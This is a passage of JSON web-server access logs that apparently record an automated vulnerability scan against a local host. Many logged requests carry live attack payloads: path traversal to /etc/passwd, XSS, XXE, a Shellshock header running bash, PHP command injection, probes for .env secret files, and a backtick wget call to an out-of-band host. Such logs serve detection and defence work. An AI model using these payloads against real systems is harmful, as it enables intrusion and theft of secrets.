/__clockwork/latest HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"]>&disclose;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_pvt/service.cnf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/20 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test/test.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kustomization.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /VisionHubWebApi/api/Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.drone.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/21 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/bps-backup/logs/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/C%3a%2fwindows%2fsystem.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /general/userinfo.php?UID=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlpserver/convert?xml=<%3fxml+version%3d\x221.0\x22+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inormalydonotexist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample-apps/hello/%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com;@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"\x5Cx00", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/jarrewrite.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"\x22() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'\x22", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/updraftplus/includes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"_dlg[captcha][target]=system(\x5C'ver\x5C')\x5C","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webmail/basic/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"\x0D\x0A{\x0D\x0A \x22type\x22:\x22EXEC\x22,\x0D\x0A \x22mbean\x22:\x22com.sun.management:type=HotSpotDiagnostic\x22,\x0D\x0A \x22operation\x22:\x22dumpHeap\x22,\x0D\x0A \x22arguments\x22:[\x0D\x0A \x22/tmp1234/test1.hprof\x22,\x0D\x0A 0\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.do?file=../../../../config.text HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2Fca28fg0smpvbd3qg07h0roce5hpwat3cj.oast.live%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET 